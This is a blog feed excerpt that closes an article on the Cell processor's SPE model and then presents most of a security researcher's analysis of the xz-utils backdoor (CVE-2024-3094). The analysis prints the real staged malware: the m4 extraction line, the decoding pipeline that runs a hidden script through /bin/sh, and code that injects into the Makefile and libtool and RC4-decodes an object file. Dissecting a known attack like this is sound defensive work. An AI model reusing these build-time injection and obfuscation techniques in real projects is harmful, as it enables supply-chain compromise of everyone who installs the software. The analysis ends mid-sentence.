<p>SPUs also feature a "SIMD-type instruction set" and 128-bit registers that can hold vectors of 32/16-bit fixed-point or floating-point values. This SIMD architecture is more well-suited for performing the same operation on multiple data elements in parallel. Leveraging the Floating-Point Unit (FPU) capable of performing single-precision (32-bit) and double-precision (64-bit) floating-point operations also helps here.</p>
<p>However, adopting an SPE-centric programming model also introduces several challenges like developers must carefully partition the data and tasks to be processed by each SPE, ensuring that there are no conflicts or race conditions when multiple SPEs access shared data structures concurrently. Proper synchronization mechanisms, such as locks or barriers, must be employed to maintain data coherency.</p>
<p>And while the PPE is responsible for initially setting up tasks and allocating resources, the SPEs may still require some level of dynamic resource management during execution. Mechanisms for requesting and releasing resources, such as memory or hardware accelerators, may need to be implemented.</p>
<p>In a distributed computing environment like the SPE-centric model, fault tolerance and error handling become also more critical. Mechanisms must be in place to detect and recover from potential failures or errors in individual SPEs, as well as to gracefully handle scenarios where one or more SPEs become unavailable.</p>
<p>And finally, codebases implementing SPE-centric algorithms may be more challenging to port to other platforms that do not share the same heterogeneous architecture as the Cell BE. This can potentially limit the reusability and portability of the codebase across different hardware targets. This is partly why <a target="_blank" href="https://www.youtube.com/watch?v=mvgGVF4Axjs">PS3 emulation</a> has been such a tough nut to crack, with Sony themselves dropping backwards compatibility support for the PS3 in the PS4.</p>
<p>Despite its initial hype and potential, the Cell processor ultimately failed to gain widespread adoption and became an architectural dead-end.</p>
<p>One of the fundamental reasons for the Cell's failure can be attributed to the breakdown of Dennard scaling. Dennard scaling, a principle that governed transistor behavior for several decades, predicted that as transistors became smaller, their power density would remain constant, allowing for higher clock speeds without increasing power consumption or heat generation.</p>
<p>The Cell processor was designed during an era when engineers were still expecting to achieve clock speeds of 5GHz or higher in consumer electronics chips. However, as the Dennard scaling limitations became apparent, the Cell's design, which relied heavily on high clock speeds, became increasingly untenable. As a result, the processor had to be pigeon-holed into a role it was not originally designed for, and Sony had to hastily integrate a separate GPU from NVIDIA to compensate for the Cell's underperforming graphics capabilities, which led to some <a target="_blank" href="https://en.wikipedia.org/wiki/RSX_Reality_Synthesizer#Bumpgate">production issues</a>.</p>
<p>Beyond the hardware limitations, the tooling and documentation for the Cell were widely criticized, further compounding the challenges developers faced in effectively utilizing the processor's capabilities. This is due to Sony probably looking to prevent developers from making their games multiplatform, which is why until only recently we never saw ports of many PS3 games to other platforms.</p>
<p>While the Cell processor represented an ambitious and innovative effort to push the boundaries of parallel computing, its performance in more general-purpose computing tasks was often lackluster due to the programming challenges and the inherent limitations of its architecture (despite it excelling in certain embarrassingly parallel workloads, such as matrix math and password cracking). While there was hype regarding its initial potential for certain specialized workloads, the Cell processor's unconventional design proved to be a misstep, and it ultimately faded into obscurity.</p>
<p>Speaking of processor designs, next article might be about CUDA kernels, but idk tho lol.</p>
]]></content:encoded></item><item><title><![CDATA[Dissecting the xz-utils Backdoor]]></title><description><![CDATA[Cover Illustration by cloudnienty

On March 29th, 2024, a critical backdoor (CVE-2024-3094) was discovered in the widely-used xz/liblzma package, a program for interacting with lzma-based compressed files. The backdoor was discovered by a Microsoft e...]]></description><link>https://research.meekolab.com/dissecting-the-xz-utils-backdoor</link><guid isPermaLink="true">https://research.meekolab.com/dissecting-the-xz-utils-backdoor</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Fri, 12 Apr 2024 15:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1712416814857/287a147d-0ec5-420c-a7b2-b4872076d650.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by cloudnienty</em></strong></p>
</blockquote>
<p>On March 29th, 2024, a critical backdoor (CVE-2024-3094) was discovered in the widely-used <code>xz</code>/<code>liblzma</code> package, a program for interacting with <code>lzma</code>-based compressed files. The backdoor was discovered by a <a target="_blank" href="https://www.openwall.com/lists/oss-security/2024/03/29/4">Microsoft engineer who saw that his program was executing 500 ms slower</a> (which is pretty rad ngl, 10x engineer type shit).</p>
<p>While many publically have called this an OpenSSH authentication bypass, this is actually a more complex remote code execution attack with the payload being seperated into four different stages, all of them are significantly obfuscated.</p>
<p>This post might contain innacurate or incomplete analysis, as this is a currently developing situation with many in the industry trying to make sense of this entire mess. This article also uses some research tidbits and references from the following articles :</p>
<ul>
<li><p>Initial <a target="_blank" href="https://www.openwall.com/lists/oss-security/2024/03/29/4">Openwall</a> post by Andres Freund</p>
</li>
<li><p><a target="_blank" href="https://research.swtch.com/xz-script">research!rsc post</a> about the shell script by Russ Cox</p>
</li>
<li><p><a target="_blank" href="https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504">smx-smx Github Gist</a> about the (WIP) dynamic analysis of the compiled binary by Stefano Moioli</p>
</li>
<li><p><a target="_blank" href="https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b">Bluesky Thread</a> about the Ed448 authentication mechanism for the RCE by Filippo Valsorda</p>
</li>
</ul>
<h2 id="heading-pre-exploit-activity">Pre-Exploit Activity</h2>
<p>The GitHub user responsible, who is using the alias Jia Tan, seemed to have worked tirelessly to obscure his activity through reverse engineering his way into backdooring the repo for more than two years. But while his [TBA]</p>
<h3 id="heading-disabling-of-linux-landlock">Disabling of Linux Landlock</h3>
<p>It seems like the threat actor disabled a piece of code in the <code>.xz</code> repository by adding subtle changes in a script used to check for <a target="_blank" href="https://docs.kernel.org/userspace-api/landlock.html">landlock support</a>, which is a security module that allows applying strict rules to limit the system calls and filesystem access of user processes, enhancing security through sandboxing.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1712217589898/ea06189d-5b1f-4730-859a-28368305f84b.png" alt class="image--center mx-auto" /></p>
<p>In the diff, the following changes are made:</p>
<ol>
<li><p>Adding a dot (.) at the end of the <code>my_sandbox</code> function definition (line 8), which introduces a syntax error in the C code and will prevent it from compiling successfully</p>
</li>
<li><p>Changing the letter 'C' in "LINUX_LANDLOCK" to a Cyrillic 'C' (line 25 and line 27), which creates a subtle difference in the string that can bypass string comparison checks</p>
</li>
</ol>
<p>The landlock bypass affects the <code>xz</code> component, and not the <code>liblzma</code> component. So its possible that this was made in preperation for a seperate payload that was still under construction.</p>
<h3 id="heading-initial-backdoor-component-in-upstream-branch">Initial Backdoor Component in Upstream Branch</h3>
<p>We can see in the .git commit history that the initial component of the backdoor compilation process <code>build-to-host.m4</code> is excluded through gitignore in the main branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711900885015/39c70c70-8f6e-476e-8252-3ad88176d693.png" alt class="image--center mx-auto" /></p>
<p>Instead we can see the file instead in the <a target="_blank" href="https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63">upstream version</a> in the <code>debian/unstable</code> branch.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1711903617262/3db3073c-3bcf-4799-965a-300abc94189e.jpeg" alt class="image--center mx-auto" /></p>
<p>While GitHub automatically generates a tarball from the git tag, maintainers also have the option to upload additional files alongside the automatic ones.This functionality is a double-edged sword.</p>
<p>On one hand, it allows maintainers to include necessary generated files that are not part of the git repository, such as configuration scripts. On the other hand, it opens the door to potential misuse if someone with access adds files that are not part of the official source.</p>
<p>Automatically generated archives might not be sufficient for complex projects and one of the solutions might be the use of <code>git tag checkout</code>. However, such changes would complicate the build and packaging processes, particularly for distributions like Debian, which often use patches and require additional files that aren't part of the upstream source.</p>
<hr />
<h2 id="heading-obfuscation-routine">Obfuscation Routine</h2>
<h3 id="heading-stage-1-build-to-hostm4">Stage 1 : <code>build-to-host.m4</code></h3>
<p>The exploit starts with this <code>build-to-host</code> file, which is an Autoconf macro file used to handle file name translations between the build environment and the target runtime environment. This is necessary when the build environment (e.g., the system where the software is being compiled) is different from the target runtime environment (e.g., the system where the compiled software will be executed).</p>
<p>The code has a very interesting tidbit, especially in the <code>somedir_c_make</code> function on <a target="_blank" href="https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L63">Line 63</a></p>
<pre><code class="lang-bash">dnl Define somedir_c_make.
[<span class="hljs-variable">$1</span>]_c_make=`<span class="hljs-built_in">printf</span> <span class="hljs-string">'%s\n'</span> <span class="hljs-string">"$[<span class="hljs-variable">$1</span>]_c"</span> | sed -e <span class="hljs-string">"<span class="hljs-variable">$gl_sed_escape_for_make_1</span>"</span> -e <span class="hljs-string">"<span class="hljs-variable">$gl_sed_escape_for_make_2</span>"</span> | tr -d <span class="hljs-string">"<span class="hljs-variable">$gl_tr_cr</span>"</span>`
dnl Use the substituted somedir variable, when possible, so that the user
dnl may adjust somedir a posteriori when there are no special characters.
 <span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> <span class="hljs-string">"$[<span class="hljs-variable">$1</span>]_c_make"</span> = <span class="hljs-string">'\"'</span><span class="hljs-string">"<span class="hljs-variable">${gl_final_[$1]}</span>"</span><span class="hljs-string">'\"'</span>; <span class="hljs-keyword">then</span>
   [<span class="hljs-variable">$1</span>]_c_make=<span class="hljs-string">'\"$([$1])\"'</span>
 <span class="hljs-keyword">fi</span>
 <span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> <span class="hljs-string">"x<span class="hljs-variable">$gl_am_configmake</span>"</span> != <span class="hljs-string">"x"</span>; <span class="hljs-keyword">then</span>
   gl_[<span class="hljs-variable">$1</span>]_config=<span class="hljs-string">'sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2&gt;/dev/null'</span>
 <span class="hljs-keyword">else</span>
   gl_[<span class="hljs-variable">$1</span>]_config=<span class="hljs-string">''</span>
 <span class="hljs-keyword">fi</span>
 _LT_TAGDECL([], [gl_path_map], [2])dnl
 _LT_TAGDECL([], [gl_[<span class="hljs-variable">$1</span>]_prefix], [2])dnl
 _LT_TAGDECL([], [gl_am_configmake], [2])dnl
 _LT_TAGDECL([], [[<span class="hljs-variable">$1</span>]_c_make], [2])dnl
 _LT_TAGDECL([], [gl_[<span class="hljs-variable">$1</span>]_config], [2])dnl
 AC_SUBST([<span class="hljs-variable">$1_c_make</span>])
</code></pre>
<p>The <code>gl_[$1]_config</code> variable is defined with a command that performs data extraction and obfuscation removal on a file specified by <code>$gl_am_configmake</code>. It reads the file's contents using <code>sed</code>, appends a newline character, and pipes the output to <code>eval</code> with the <code>$gl_path_map</code> variable, which contains a <code>tr</code> command that performs character substitutions (likely to "uncorrupt" obfuscated data). The resulting output is then piped to a command specified by <code>$gl_[$1]_prefix</code> with the <code>-d</code> option, presumably for decompression or decoding. Any errors from this final command are suppressed by redirecting them to <code>/dev/null</code>. This process is designed to extract and execute a hidden, obfuscated script from the <code>tests/files/bad-3-corrupt_lzma2.xz</code> file during the build process.</p>
<pre><code class="lang-bash">gl_sed_double_backslashes=<span class="hljs-string">'s/\\/\\\\/g'</span>
gl_sed_escape_doublequotes=<span class="hljs-string">'s/"/\\"/g'</span>
gl_path_map=<span class="hljs-string">'tr "\t \-_" " \t_\-"'</span>
</code></pre>
<p>Next part of the exploit is contained in <a target="_blank" href="https://salsa.debian.org/debian/xz-utils/-/blob/debian/unstable/m4/build-to-host.m4?ref_type=heads#L95">Line 95</a> of the code, which acts as the translation function to un-obfuscate the <code>bad-3-corrupt_lzma2.xz</code> payload.</p>
<hr />
<h3 id="heading-stage-2-bad-3-corruptlzma2xz">Stage 2 : <code>bad-3-corrupt_lzma2.xz</code></h3>
<p>After the deobfuscating routine is completed, we get the following bash file. This seems to be another deobfuscation routine.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># retrieve the 'srcdir' path from config.status or a parent's config.status</span>
<span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f config.status; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> $(grep ^srcdir= config.status)
<span class="hljs-keyword">elif</span> <span class="hljs-built_in">test</span> -f ../../config.status; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> $(grep ^srcdir= ../../config.status)
    srcdir=<span class="hljs-string">"../../<span class="hljs-variable">$srcdir</span>"</span>
<span class="hljs-keyword">fi</span>

<span class="hljs-comment"># export a command sequence to variable 'i' for later evaluation</span>
<span class="hljs-built_in">export</span> i=<span class="hljs-string">"(\
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +2048 &amp;&amp; \
(head -c +1024 &gt; /dev/null) &amp;&amp; head -c +724 \
)"</span>

<span class="hljs-comment"># process a compressed file, apply transformations, decompress, and execute as shell commands</span>
(
    xz -dc <span class="hljs-string">"<span class="hljs-variable">$srcdir</span>/tests/files/good-large_compressed.lzma"</span> | \
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span> | \
    tail -c +31265 | \
    tr <span class="hljs-string">"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"</span> <span class="hljs-string">"\0-\377"</span> \
) | xz -F raw --lzma1 -dc | /bin/sh
</code></pre>
<p>The script begins by evaluating the contents of the <code>config.status</code> file to extract the value of the <code>srcdir</code> variable, which likely represents the project's source directory. This step is essential for locating the required files and directories during the deobfuscation process.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">eval</span> `grep ^srcdir= config.status`
<span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f ../../config.status;<span class="hljs-keyword">then</span>
<span class="hljs-built_in">eval</span> `grep ^srcdir= ../../config.status`
srcdir=<span class="hljs-string">"../../<span class="hljs-variable">$srcdir</span>"</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>The next step is to define a function <code>i</code> that performs selective byte extraction from a data stream. This function is a long chain of <code>head</code> commands that alternately skip and output bytes from the input.</p>
<pre><code class="lang-bash"><span class="hljs-built_in">export</span> i=<span class="hljs-string">"((head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; (head -c +1024 &gt;/dev/null) &amp;&amp; head -c +2048 &amp;&amp; ... &amp;&amp; head -c +724)"</span>
</code></pre>
<p>The function starts by skipping the first 1024 bytes (<code>head -c +1024 &gt;/dev/null</code>), followed by outputting the next 2048 bytes (<code>head -c +2048</code>). This pattern repeats, alternating between skipping 1024 bytes and outputting 2048 bytes. The final <code>head</code> command outputs either 724 or 939 bytes, depending on the script version.</p>
<p>The code then proceeds to its main deobfuscation process is encapsulated in the following command</p>
<p>Finally, the decompressed and deobfuscated data is piped to the system's shell (<code>/bin/sh</code>) and executed.</p>
<pre><code class="lang-bash">(xz -dc <span class="hljs-variable">$srcdir</span>/tests/files/good-large_compressed.lzma|<span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span>|tail -c +31265|tr <span class="hljs-string">"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"</span> <span class="hljs-string">"\0-\377"</span>)|xz -F raw --lzma1 -dc|/bin/sh
</code></pre>
<p>The script decompresses the <code>tests/files/good-large_compressed.lzma</code> file using the <code>xz -dc</code> command. The decompressed output is then piped to the <code>eval $i</code> command, which applies the previously defined <code>i</code> function. This step selectively extracts specific byte ranges from the decompressed data stream. The output from the previous step is put to <code>tail -c +31265</code>, which skips the first 31,264 bytes (or 31,232 bytes, depending on the version).</p>
<p>The remaining data is then passed through a <code>tr</code> command, which performs a character substitution or decryption using a specific key (<code>"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"</code>). The output from the previous step is then decompressed again using the LZMA1 compression algorithm in <code>xz -F raw --lzma1 -dc</code>.</p>
<p>The resulting file is the next piece of the code, which is one of the more beefier sections of the exploit outside of the main payload.</p>
<hr />
<h3 id="heading-stage-3-good-largecompressedlzma">Stage 3 : <code>good-large_compressed.lzma</code></h3>
<p>The final bash script from <code>good-large_compressed.lzma</code> is significantly more complex than the previous scripts, but in the end its just another layer of deobfuscation with additional checks.</p>
<p>The script starts by performing a series of checks to ensure that the environment meets specific conditions.</p>
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f config.status; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$zrKcSS</span>
    <span class="hljs-built_in">eval</span> `grep ^LD=\<span class="hljs-string">'\/ config.status`
    eval `grep ^CC=\'</span> config.status`
    <span class="hljs-built_in">eval</span> `grep ^GCC=\<span class="hljs-string">' config.status`
    eval `grep ^srcdir=\'</span> config.status`
    <span class="hljs-built_in">eval</span> `grep ^build=\<span class="hljs-string">'x86_64 config.status`
    eval `grep ^enable_shared=\'</span>yes\<span class="hljs-string">' config.status`
    eval `grep ^enable_static=\'</span> config.status`
    <span class="hljs-built_in">eval</span> `grep ^gl_path_map=\<span class="hljs-string">' config.status`
    eval $zrKccj
    # ... (more checks follow)
fi</span>
</code></pre>
<p>The code first checks for the existence of the <code>config.status</code> file, and then reads the specific values of various variables (e.g., <code>LD</code>, <code>CC</code>, <code>GCC</code>, <code>srcdir</code>, <code>build</code>, <code>enable_shared</code>, <code>enable_static</code>, <code>gl_path_map</code>) from the <code>config.status</code> file.</p>
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> -f <span class="hljs-string">"<span class="hljs-variable">$srcdir</span>/debian/rules"</span> || <span class="hljs-built_in">test</span> <span class="hljs-string">"x<span class="hljs-variable">$RPM_ARCH</span>"</span> = <span class="hljs-string">"xx86_64"</span>; <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$zrKcst</span>
    <span class="hljs-comment"># ... (more checks follow)</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>The code then checks if either the <code>debian/rules</code> file exists in the source directory (<code>$srcdir</code>) or if the <code>RPM_ARCH</code> variable is set to <code>x86_64</code>. This means that the target system must be x86-64, and the compilation process must be part of a Debian or RPM package build.</p>
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> (<span class="hljs-built_in">test</span> -f .libs/liblzma_la-crc64_fast.o) &amp;&amp; (<span class="hljs-built_in">test</span> -f .libs/liblzma_la-crc32_fast.o); <span class="hljs-keyword">then</span>
    <span class="hljs-built_in">eval</span> <span class="hljs-variable">$zrKcKQ</span>
    <span class="hljs-comment"># ... (more checks follow)</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>If the conditions are met and the script is running in the context of a Debian or RPM package build, it modifies the <code>src/liblzma/Makefile</code> file.</p>
<pre><code class="lang-bash">b=<span class="hljs-string">"am__test = <span class="hljs-variable">$U</span>"</span>  <span class="hljs-comment"># U is the 'bad-3-corrupt_lzma2.xz' file</span>
sed -i <span class="hljs-string">"/<span class="hljs-variable">$j</span>/i<span class="hljs-variable">$b</span>"</span> src/liblzma/Makefile || <span class="hljs-literal">true</span>

<span class="hljs-comment"># inject additional rules and variables</span>
h=<span class="hljs-string">"-Wl,--sort-section=name,-X"</span>
<span class="hljs-keyword">if</span> ! <span class="hljs-built_in">echo</span> <span class="hljs-string">"<span class="hljs-variable">$LDFLAGS</span>"</span> | grep -qs -e <span class="hljs-string">"-z,now"</span> -e <span class="hljs-string">"-z -Wl,now"</span> &gt; /dev/null 2&gt;&amp;1;<span class="hljs-keyword">then</span>
    h=<span class="hljs-variable">$h</span><span class="hljs-string">",-z,now"</span>
<span class="hljs-keyword">fi</span>
j=<span class="hljs-string">"liblzma_la_LDFLAGS += <span class="hljs-variable">$h</span>"</span>
sed -i <span class="hljs-string">"/<span class="hljs-variable">$L</span>/i<span class="hljs-variable">$j</span>"</span> src/liblzma/Makefile || <span class="hljs-literal">true</span>
</code></pre>
<p>These modifications include:</p>
<ul>
<li><p>Adding a reference to a corrupted test file (<code>bad-3-corrupt_lzma2.xz</code>) as a dependency</p>
</li>
<li><p>Injecting additional build rules and variables related to linker flags, object file dependencies, and environment variable exports</p>
</li>
<li><p>Modifying the linker flags to include options like <code>-z,now</code> (disabling lazy binding) and <code>-Wl,--sort-section=name,-X</code> (sorting sections by name and applying linker script).</p>
</li>
</ul>
<p>The script also modifies the <code>libtool</code> script by replacing a specific pattern (<code>^pic_flag=\" -fPIC -DPIC\"$</code>) with a custom compilation flag (<code>-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections</code>).</p>
<pre><code class="lang-bash">sed -i <span class="hljs-string">"s/<span class="hljs-variable">$O</span>/<span class="hljs-variable">$C</span>/g"</span> libtool || <span class="hljs-literal">true</span>
<span class="hljs-comment"># O="^pic_flag=\" -fPIC -DPIC\"$"</span>
<span class="hljs-comment"># C="pic_flag=\" $P\"" (where P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections")</span>
</code></pre>
<p>If the script detects the presence of specific object files (<code>liblzma_la-crc64_fast.o</code> and <code>liblzma_la-crc32_fast.o</code>), it performs additional checks and then generates new versions of these object files. This process involves retrieving a compressed payload from the <code>good-large_compressed.lzma</code> file and then decompressing and decoding the payload using a modified version of RC4.</p>
<pre><code class="lang-bash"><span class="hljs-comment"># Decompress the input file using xz</span>
xz -dc <span class="hljs-variable">$top_srcdir</span>/tests/files/<span class="hljs-variable">$p</span> |

<span class="hljs-comment"># Evaluate the decoded file</span>
<span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span> |

<span class="hljs-comment"># Convert each character to a separate line</span>
LC_ALL=C sed <span class="hljs-string">"s/\(.\)/\1\n/g"</span> |

<span class="hljs-comment"># Implement a modified RC4 algorithm</span>
LC_ALL=C awk
BEGIN {
    <span class="hljs-comment"># Set the field separator to newline and record separator to newline</span>
    FS=<span class="hljs-string">"\n"</span>; RS=<span class="hljs-string">"\n"</span>; ORS=<span class="hljs-string">""</span>

    <span class="hljs-comment"># Initialize variables</span>
    m = 256 <span class="hljs-comment"># Modulus value</span>
    <span class="hljs-keyword">for</span> (i = 0; i &lt; m; i++) {
        t[sprintf(<span class="hljs-string">"x%c"</span>, i)] = i <span class="hljs-comment"># Create a lookup table for characters</span>
        c[i] = ((i * 7) + 5) % m <span class="hljs-comment"># Initialize the state array</span>
    }
    i = 0; j = 0

    <span class="hljs-comment"># "Drop" RC4, discarding 4096 bytes of keystream</span>
    <span class="hljs-keyword">for</span> (l = 0; l &lt; 4096; l++) {
        i = (i + 1) % m
        a = c[i]
        j = (j + a) % m
        c[i] = c[j]
        c[j] = a
    }
}

<span class="hljs-comment"># Decoding loop</span>
{
    <span class="hljs-comment"># Lookup the character value</span>
    v = t[<span class="hljs-string">"x"</span> (NF &lt; 1 ? RS : <span class="hljs-variable">$1</span>)]

    <span class="hljs-comment"># Generate keystream bytes</span>
    i = (i + 1) % m
    a = c[i]
    j = (j + a) % m
    b = c[j]
    c[i] = b
    c[j] = a
    k = c[(a + b) % m]

    <span class="hljs-comment"># Apply the keystream with addition modulo 256</span>
    <span class="hljs-built_in">printf</span> <span class="hljs-string">"%c"</span>, (v + k) % m
} |

<span class="hljs-comment"># Decompress the output again using xz</span>
xz -dc --single-stream |

<span class="hljs-comment"># Truncate the output to the desired length</span>
((head -c +<span class="hljs-variable">$N</span> &gt; /dev/null 2&gt;&amp;1) &amp;&amp; head -c +<span class="hljs-variable">$W</span>) &gt; liblzma_la-crc64-fast.o || <span class="hljs-literal">true</span>
</code></pre>
<p>The script starts by decompressing an input file using the <code>xz</code> utility with the <code>-dc</code> option, which decompresses the input from standard input and writes the decompressed data to standard output. The decompressed data is then evaluated using <code>eval $i</code>, where <code>$i</code> is likely a variable containing the decoded data.</p>
<p>The output of the <code>eval</code> command is piped to <code>sed</code>, which replaces each character with a newline character using the <code>s/\(.\)/\1\n/g</code> command. This step is necessary to prepare the data for the next stage, which is implemented using <code>awk</code>. The <code>awk</code> script implements a modified RC4 algorithm to decode the obfuscated data.</p>
<p>The <code>BEGIN</code> block initializes variables and prepares the RC4 state array. It creates a lookup table <code>t</code> to map characters to their corresponding byte values, and initializes the state array <code>c</code> with a linear congruential generator.</p>
<p>The <code>for</code> loop inside the <code>BEGIN</code> block "drops" the first 4096 bytes of the RC4 keystream by performing 4096 iterations of the RC4 key setup.</p>
<p>The main decoding loop looks up the byte value of the current character using the <code>t</code> lookup table and generates two keystream bytes using the RC4 algorithm and then applies the keystream to the current character using addition modulo 256 instead of the usual XOR operation and the decoded character is printed to standard output.</p>
<p>The decoded output from the <code>awk</code> script is then piped back to <code>xz</code> with the <code>-dc --single-stream</code> options, which decompresses the data again. And then finally the script uses the <code>head</code> command to truncate the output to a specific length, determined by the values of <code>$N</code> and <code>$W</code>. The truncated output is redirected to the file <code>liblzma_la-crc64-fast.o</code>.</p>
<pre><code class="lang-bash">xz -dc <span class="hljs-variable">$top_srcdir</span>/tests/files/<span class="hljs-variable">$p</span> | <span class="hljs-built_in">eval</span> <span class="hljs-variable">$i</span> | LC_ALL=C sed <span class="hljs-string">"s/\(.\)/\1\n/g"</span> | LC_ALL=C awk <span class="hljs-string">'...'</span> | xz -dc --single-stream | ((head -c +<span class="hljs-variable">$N</span> &gt; /dev/null 2&gt;&amp;1) &amp;&amp; head -c +<span class="hljs-variable">$W</span>) &gt; liblzma_la-crc64-fast.o || <span class="hljs-literal">true</span>
<span class="hljs-comment"># decompresses and decodes the payload from 'good-large_compressed.lzma'</span>

sed <span class="hljs-string">"/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()"</span> <span class="hljs-variable">$top_srcdir</span>/src/liblzma/check/crc64_fast.c | \
sed <span class="hljs-string">"/include \"crc_x86_clmul.h\"/a \\<span class="hljs-variable">$V</span>"</span> | \
sed <span class="hljs-string">"1i # 0 \"<span class="hljs-variable">$top_srcdir</span>/src/liblzma/check/crc64_fast.c\""</span> 2&gt;/dev/null | \
<span class="hljs-variable">$CC</span> <span class="hljs-variable">$DEFS</span> <span class="hljs-variable">$DEFAULT_INCLUDES</span> <span class="hljs-variable">$INCLUDES</span> <span class="hljs-variable">$liblzma_la_CPPFLAGS</span> <span class="hljs-variable">$CPPFLAGS</span> <span class="hljs-variable">$AM_CFLAGS</span> <span class="hljs-variable">$CFLAGS</span> -r liblzma_la-crc64-fast.o -x c -  <span class="hljs-variable">$P</span> -o .libs/liblzma_la-crc64_fast.o 2&gt;/dev/null
<span class="hljs-comment"># prepends a header, appends custom code, and compiles the modified crc64_fast.c</span>
</code></pre>
<p>The <code>$V</code> variable contains the malicious code injection, specifically the script replaces the original <code>is_arch_extension_supported()</code> function in the <code>crc64_fast.c</code> and <code>crc32_fast.c</code> files with this malicious <code>_is_arch_extension_supported()</code> function</p>
<p>The <code>is_arch_extension_supported()</code> function is supposed to check if the CPU supports certain architecture extensions needed for optimized CRC computation. The xz-utils library contains optimized CRC implementations that take advantage of CPU-specific instructions like the <code>CLMUL</code> instruction set on x86 CPUs. The <code>is_arch_extension_supported()</code> function is used to dynamically determine if the optimized CRC implementations can be used or if the generic (non-optimized) implementations should be used instead.</p>
<pre><code class="lang-bash"><span class="hljs-keyword">if</span> <span class="hljs-variable">$AM_V_CCLD</span><span class="hljs-variable">$liblzma_la_LINK</span> -rpath <span class="hljs-variable">$libdir</span> <span class="hljs-variable">$liblzma_la_OBJECTS</span> <span class="hljs-variable">$liblzma_la_LIBADD</span>; <span class="hljs-keyword">then</span>
    <span class="hljs-keyword">if</span> <span class="hljs-built_in">test</span> ! -f .libs/liblzma.so; <span class="hljs-keyword">then</span>
        mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || <span class="hljs-literal">true</span>
        mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || <span class="hljs-literal">true</span>
    <span class="hljs-keyword">fi</span>
    rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || <span class="hljs-literal">true</span>
<span class="hljs-keyword">else</span>
    mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || <span class="hljs-literal">true</span>
    mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || <span class="hljs-literal">true</span>
<span class="hljs-keyword">fi</span>
</code></pre>
<p>After modifying <code>crc64_fast.c</code> source file, it then compiles it using the previously generated <code>liblzma_la-crc64-fast.o</code> file as input. The resulting object file (<code>liblzma_la-crc64-fast.o</code>) is then used to rebuild the <code>liblzma</code> library, which is the next level of the malware.</p>
<hr />
<h2 id="heading-the-backdoor-liblzmala-crc64-fasto">The Backdoor : <code>liblzma_la-crc64-fast.o</code></h2>
<p>A <code>.o</code> binary is an object file that contains metadata generated by a compiler during compilation, and its not usually directly executable. These files need to be linked together to create an executable binary or a shared library.</p>
<p>The previous <code>good-large_compressed.lzma</code> script is modifies <code>liblzma_la-crc64-fast.o</code> and then links it into a shared library (<code>liblzma.so</code>) using the linker command</p>
